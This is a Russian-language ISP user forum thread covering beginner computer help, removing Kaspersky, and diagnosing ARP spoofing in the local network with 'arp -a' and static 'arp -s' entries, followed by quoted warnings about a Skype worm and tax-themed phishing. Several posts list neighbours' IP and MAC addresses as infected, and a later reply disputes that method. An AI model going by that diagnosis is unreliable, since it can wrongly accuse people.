И потому учусь, используя для этого любую возможность. Самообучение... Предпочитаю искать ответы на Google (http://www.google.ru/) , но можно и другие поисковики. Так же книги помогают. Начинал, как сейчас помню, с книги "Энциклопедия персонального компьютера 2000". Автор - В. Леонтьев. (до неё года 2 пытался освоить комп самостоятельно, но уж слишком там всё было по другому, после предыдущих моих игрушек :)) Кстати и сейчас можно купить эту полезную вещь - правда она переиздается каждый год - сейчас видимо уже будет "Энциклопедия персонального компьютера 2008". До неё тоже были книжки, но слишком специфичные - а вот эта - как раз для начинающих. Впрочем, я на форуме уже об этом говорил.
Однако вы так и не ответили на мой вопрос -

Что именно не получилось то? Пишите проблему подробнее пожалуйста.
Высокомерия не было - была реплика, что наибольший эффект достигается когда человек сам познает истину, а не кто-то преподносит ему на блюдечке. Вы же даже не описали проблему, а я не телепат. Да и на форуме их тоже не густо.
И, пожалуйста, научитесь пользоваться правильным оформлением сообщений. Как это сделать рассказано тут (http://www.solnechnogorsk.net/forum/forum20/thread8299.html).
Практика показывает, что как бы я не настраивал комп моим клиентам (а у меня их немало), через день (неделю, месяц - максимум полгода - зависит от кривизны рук)) вылезает проблема. Поэтому предложение

Вот было бы замечательно, если бы всё сразу установили, не было бы никакой головной боли. изначально обречено на провал - рано или поздно (а у новичков обычно рано) вам придется таки научиться самим решать проблемы.

Да, я тоже начинал с этой книги, прада тогда она называлась "Новейшая Энциклопедия персонального Компьютера 2003" автор Виталий Леонтьев =) Очень тогда мне помогла... и с фтп разобрался, и оперативу сам поменял, и про антивирусы узнал, в прошлом году подарили за 2007 год такую же энциклопедию =)))) Думаю все начинали с 0, но кто-то с новичков переквалифицировался в опытных пользователей (тот, у кого было желание самосовершенствоваться), а кто-то так и остался профаном...)

Я тоже отпишу. Начинал с "Курса молодого бойца". В в\ч, солдатики дали мне листовки, мол компьютер есть, вот и изучай.. Кратко в них были основные понятия тогда ещё windows 3.1 и версии Dos 3.1, 4.0, 6.20 (22), описание Worda 6.0 и.тд
В дальнейшем помогла очень книга Фигурнова... и ещё немалое количество литературы...
Первый мой процессор DX2 Частота 50 Mгц. Duke Nuked 3d прошёл ! :)
В 2006г. интерес к железу PC пропал :)

Осваивать комп можно всю жизнь, только надо ли это ?

Doctor ORZ примите мои извинения-была неправа(насчет высокамерия),просто самообучаться к сожалению нет времени, а комп глючит и меня это бесит.
Никак не могу удалить Касперского, один чел. его не до конца установил и теперь постоянно(раз в 5 минут) вылетает сообщение, если его во время не закрыть все слетает Может подскажите, что делать?И уточните, пожалуйста фамилию автора книги(всё-таки Листьев или Леонтьев).

Согласен с -Доктором- :yes:,что проблемы рано,или позно вылазеют,но извините -Док-,а у вас их не бывает???Я сам тоже помагаю друзьям и знакомым с компами,но когда мне подключили ИНЕТ ,такого гимора я себе и представить не мог....-это я про ВИРУСЫ......Так-что краткая консультация,и помощь в установки АНТИвируса ,при подключении просто Обязательна.....

Книга - вот она (http://www.book.ru/180323).
Ну если краткая - то вот она (http://support.solnet.ru/faq.php?do=article&articleid=91).
Проблемы ессно бывают, но опять же - сначала Гугль, потом уже всё остальное. Не надо бояться искать ответ. Тем более на форуме расписано как именно нужно искать.

Discer или Doctor, а может мне реально поможете?!
В собственных силах как -то не уверенна.

Возможно стоит установить Каспера еще раз, но до конца?
После чего корректно удалить.


но когда мне подключили ИНЕТ ,такого гимора я себе и представить не мог
А вот как раз для этого случая я даже тему (http://www.solnechnogorsk.net/forum/forum18/thread39585.html) отдельную создал.

Оффтоп или онтоп(как уж оценят): Сейчас все программы и ОСи стали до безобразия простыми для пользователя... В основном для установки надо просто давить "далее" после запуска(а в основном это уже идёт через автозапуск с диска или же надо просто на файле сделать двойной клик) инсталятора(инсталятор - это такая "мини программа", которая позволяет собственно установить с некими параметрами программу основную(версия, путь установки и иногда прочее))и поставить кое где галочки(для ярлыка на рабочий стол, для просмотра или отказа от просмотра read me файла(а это очень полезный документ, обязателен к чтению тем, кто с компьютером на вы)... Далее касперского можно удалить через панель управления->установка и удаление программ, ну или при помощи ссылки на деинсталятор("мини программа", которая удаляет основную программу) в пуске, либо напрямую из директории через экзешник деинсталятора(последнее не для вас). Далее перезагрузить компьютер(да и после установки тоже его надо будет перезагрузить).

З.Ы. Книжек вообще не читал в своё время... Первую винду поставил в 13 лет(98 первый ещё эдишн), первый компьютер собрал в 16 лет... И тогда всё было гораздо сложнее... Чего стоили только эти загрузочные дискеты и то, чтобы поменять какую то часть в компьютере надо было извлечь 70% уже установленного минимум, чтобы просто долезть до материнской платы.
А сейчас многие просто явно не хотят разбираться в том, в чём и разбираться то особо нечего.

З.Ы. Книжек вообще не читал в своё время... Первую винду поставил в 13 лет(98 первый ещё эдишн), первый компьютер собрал в 16 лет... И тогда всё было гораздо сложнее... Чего стоили только эти загрузочные дискеты и то, чтобы поменять какую то часть в компьютере надо было извлечь 70% уже установленного минимум, чтобы просто долезть до материнской платы. Это, что за 70% ты извлекал, чтобы долезть до материнки :eek::)
Сорри за офф, но уж очень стало интересно :biggrin2:

70% - это в лучшем случае, между прочим.
Если нужно - могу сфоткать и выложить что почем. Но если время будет.

Товарищи пользователи и модераторы, нефиг флудить!!!
А теперь к делу:
Проявление вируса, орудующего в нашей сети в том, что он маскируется под хаб Солнета и перенаправляет траффик через себя.
В этом не трудно убедиться, набрав в командной строке
arp -a
в результате получим что-то вроде:
C:\Documents and Settings\Администратор>arp -a

Интерфейс: 192.168.38.ХХХ --- 0x4
Адрес IP Физический адрес Тип
192.168.38.1 00-1b-90-3c-65-c0 динамический
192.168.38.43 00-1b-24-8d-1a-6e динамический
192.168.38.221 00-16-d3-ec-61-40 динамический
192.168.38.224 00-17-31-99-ad-fb динамический
Что это означает? А то, что 43, 221 и 224 заражены и создают нам в 38 подсети нехилые тормоза!
Как собственными силами можно исправить ситуацию? Пишем там же в командной строке:
arp -s Адрес_IP_хаба Физический адрес_хаба
то есть, для 38 подсети:
arp -s 192.168.38.1 00-1b-90-3c-65-c0
в итоге получаем:
C:\Documents and Settings\Администратор>arp -a

Интерфейс: 192.168.38.ХХХ --- 0x4
Адрес IP Физический адрес Тип
192.168.38.1 00-1b-90-3c-65-c0 статический
Странички на форуме и в Интернете начинают открываться намного быстрее!!! :sty101:
Рекомендую всем написать BAT-файл и положить его в автозагрузку чтобы автоматизировать данное действие
Уважаемая администрация! Примите, пожалуйста, меры по отношению к следующим гражданам:
192.168.38.43 00-1b-24-8d-1a-6e
192.168.38.221 00-16-d3-ec-61-40
192.168.38.224 00-17-31-99-ad-fb
192.168.38.155 00-14-85-14-51-bc
192.168.38.167 00-11-2f-43-8d-24
192.168.38.200 00-13-77-3c-f6-9f
192.168.38.26 00-19-db-aa-cc-ee


Выражаю глубокую признательность братишке Никитке за наставления в данном вопросе!!!

Провёл сию операцию для 20 подсети. Результат:

C:\Documents and Settings\Администратор>arp -a

Интерфейс: 192.168.20.ххх --- 0x2
Адрес IP Физический адрес Тип
192.168.20.1 00-1b-90-3c-65-c0 статический
192.168.20.113 00-11-95-5c-29-d8 динамический

Потом ввёл в командной строке arp -s 192.168.20.1 00-1b-90-3c-65-c0 - Толку 0. Как тормозили до уж0са http ресурсы так и тормозят.:censored:

Discer или Doctor, а может мне реально поможете?!
В собственных силах как -то не уверенна. Janna!!! Если у вас сильно глючит комп....самый верный и главное(надёжный)способ исправить эту ситуацию------это полная переустановка Винды,и правильная установка ПО,включая АНТИвирус(советую NOD-32,надёжный,понятный,и не загружающий систему.)

C:\Documents and Settings\Root>arp -a

Интерфейс: 192.168.48.*** --- 0x2
Адрес IP Физический адрес Тип
192.168.48.1 00-1b-90-3c-65-c0 динамический

Вроде ок всё)

Интерфейс: 192.168.48.148 --- 0x2
Адрес IP Физический адрес Тип
192.168.48.1 00-1b-90-3c-65-c0 динамический
192.168.48.193 00-18-f3-93-8b-c9 динамический

Интерфейс: 192.168.48.247 --- 0x2
Адрес IP Физический адрес Тип
192.168.48.1 00-1b-90-3c-65-c0 динамический
192.168.48.148 00-13-d3-99-b4-24 динамический

Хм... Marwit, твой ип появился... что бы это значило?
Его комп заражён? :thumbsdow

Microsoft Windows [Версия 6.0.6000]
(C) Корпорация Майкрософт, 2006. Все права защищены.

C:\Windows\system32>arp -a

Интерфейс: 192.168.23.156 --- 0x8
IP-адрес Физический адрес Тип
192.168.23.1 00-1b-90-3c-65-c0 динамический
192.168.23.69 00-15-58-65-61-a2 динамический
192.168.23.77 00-18-f3-0e-50-34 динамический
192.168.23.120 00-1a-4d-2b-62-00 динамический
192.168.23.145 00-11-d8-4d-a5-83 динамический
192.168.23.167 00-50-8d-e7-05-36 динамический
192.168.23.170 00-11-95-d1-f4-f0 динамический
192.168.23.205 00-04-76-e2-ca-73 динамический
192.168.23.213 00-13-d3-c2-fc-ab динамический
192.168.23.232 00-1b-11-84-f3-97 динамический
192.168.23.241 00-13-d4-8e-1d-3c динамический
192.168.23.251 00-0f-b0-81-de-77 динамический
192.168.23.254 00-17-31-c1-95-24 динамический
192.168.23.255 ff-ff-ff-ff-ff-ff статический
224.0.0.22 01-00-5e-00-00-16 статический


Кхм...нда..слов нет-одни эмоции :censored:

Интерфейс: 192.168.29.xxx --- 0x2
Адрес IP Физический адрес Тип
80.92.96.84 00-1b-90-3c-65-c0 динамический
80.92.100.180 00-1b-90-3c-65-c0 динамический
192.168.29.1 00-1b-90-3c-65-c0 статический
192.168.29.57 00-0c-76-cc-ac-76 динамический
192.168.254.21 00-1b-90-3c-65-c0 динамический
Ну и я чтоли вставлю:) И интересно вот за что забанили человека, донёсшего эту операцию до народа? За выражение своих эмоций в конце... Ну не было же там мата чистого. Такими темпами и у меня в подписи можно понять мат, а там совсем другое... И вот чтоб уже это понять надо подумать, а не представить первое, что в голову придёт:)

Почему-то многие подумали что эта команда показывает зараженные компьютеры.... Это не так (точнее отчасти так).... Поэтому не стоит тут публиковать списки якобы завирусованных компьютеров......

Viper, а команда arp -s и так далее тоже не работает? Странно но после её ввода никаких вылетов сети не наблюдается. Хотя тут есть три варианта: 1) команда работает всё таки для незаражённых компьютеров, 2) солнет наладил работу сети в последнее время, 3) аваст + нод обновили свои базы до такого уровня, что теперь всю эту гадость глушат... Ну и может всё сразу конечно:)

Почему-то многие подумали что эта команда показывает зараженные компьютеры.... Это не так (точнее отчасти так)....
Вопрос чисто из любопытства-а что именно она показывается и о чем этот самый arp -s(у меня правда не работает ибо выдает ошибку)

2Reckless - ты забыл четвертый вариант - зараженный комп выключился.
Антивирус сам по себе с этой гадостью не справляется - нужен ещё настроенный файрвол плюс обновления для системы.

Ну так ведь там же хельп есть встроенный...

Отображение и изменение таблиц преобразования IP-адресов в физические, используе
мые протоколом разрешения адресов (ARP).

ARP -s inet_addr eth_addr [if_addr]
ARP -d inet_addr [if_addr]
ARP -a [inet_addr] [-N if_addr]

-a Отображает текущие ARP-записи, опрашивая текущие данные
протокола. Если задан inet_addr, то будут отображены IP и
и физический адреса только для заданного компьютера.
Если более одного сетевого интерфейса используют ARP,
то будут отображаться записи для каждой таблицы.
-g То же, что и ключ -a.
inet_addr Определяет IP-адрес.
-N if_addr Отображает ARP-записи для заданного в if_addr сетевого
интерфейса.
-d Удаляет узел, задаваемый inet_addr. inet_addr может содержать
символ шаблона * для удаления всех узлов.
-s Добавляет узел и связывает internet адрес inet_addr
с физическим адресом eth_addr. Физический адрес задается
6 байтами (в шестнадцатеричном виде), разделенных дефисом.
Эта связь является постоянной.
eth_addr Определяет физический адрес.
if_addr Если параметр задан, - он определяет интернет адрес интерфейса,
чья таблица преобразования адресов должна измениться.
Eсли не задан, - будет использован первый доступный интерфейс.
Пример:
> arp -s 157.55.85.212 00-aa-00-62-c6-09 ... Добавляет статическую запись.
> arp -a ... Выводит ARP-таблицу.

80.92.96.84 00-1b-90-3c-65-c0 динамический
80.92.100.180 00-1b-90-3c-65-c0 динамический
192.168.29.1 00-1b-90-3c-65-c0 статический
192.168.29.57 00-0c-76-cc-ac-76 динамический
192.168.254.21 00-1b-90-3c-65-c0 динамический
В данном примере видно, что компьютер с мак-адресом 00-1b-90-3c-65-c0 "подменяет" несколько IP адресов. Из этих IP-адресов возможно только один является "зараженым" (или же абонент сознательно занимается arp-spuffing-ом). Что бы быть в этом уверенным надо наблюдать за этим мак-адресом некоторое время. ARP-таблицу желательно смотреть не с компьютеров абонентов, а на узловом оборудовании в сегменте.

"Обнаружена массовая рассылка через Skype и социальные сети, приводящая к заражению Windows-компьютеров червем Worm.NgrBot. Опасность угрозы усугубляется тем, что вредоносную ссылку пользователи получают от имени своих авторизованных контактов.
...
Опасная ссылка сопровождается сообщением «Это новый аватар твоего профиля?» либо «ey eto vasha novaya kartina profil’? [ник в Skype]». При переходе по ссылке в систему загружается ZIP-архив с вредоносным исполняемым файлом с расширением .EXE."

Подробнее: CNews: В Skype идет массовая вирусная рассылка (http://safe.cnews.ru/news/top/index.shtml?2012/10/05/505622)

Налоговая предупреждает о вирусах
Уважаемые налогоплательщики!
ФНС России предупреждает Вас о рассылках вирусов от имени Службы.
В последнее время участились случаи рассылки электронных писем с уведомлениями о задолженности и ссылками, ведущими на скачивание вируса-шифровальщика. В качестве отправителя указывается ФНС России. Однако имя отправителя, указанное в поле «From:», не гарантирует отправку письма именно этим адресатом.
Чтобы отличить поддельное письмо от настоящего, специалисты ФНС рекомендуют обратить внимание на техническую часть письма.

В настоящих письмах от ФНС России указан домен nalog.ru.
Официальная рассылка ФНС России направляется только тем пользователям, которые указали и подтвердили адрес своей электронной почты в сервисе Личный кабинет налогоплательщика.
Новостная рассылка сайта www.nalog.ru (http://www.nalog.ru/) направляется пользователям сайта, которые оформили подписку.
ФНС России не рассылает сообщения о наличии задолженности и с предложениями оплатить долг он-лайн.
http://www.ozersk74.ru/news/incident/349591.php

А ещё присылают типа акты сверки в формате zip и doc. Давно гуляет. Сначала смотрите название контрагента и проверьте есть ли у вас такой. Уведомление из "налоговой" тоже приходило на рабочую почту. Но у нас связь с налоговой через специальный сервис ( в налоговой есть их реклама), поэтому мы сразу заподозрили неладное. Сейчас у организаций как раз пора подготовки к годовому балансу и в запаре можно хватануть опасный файл.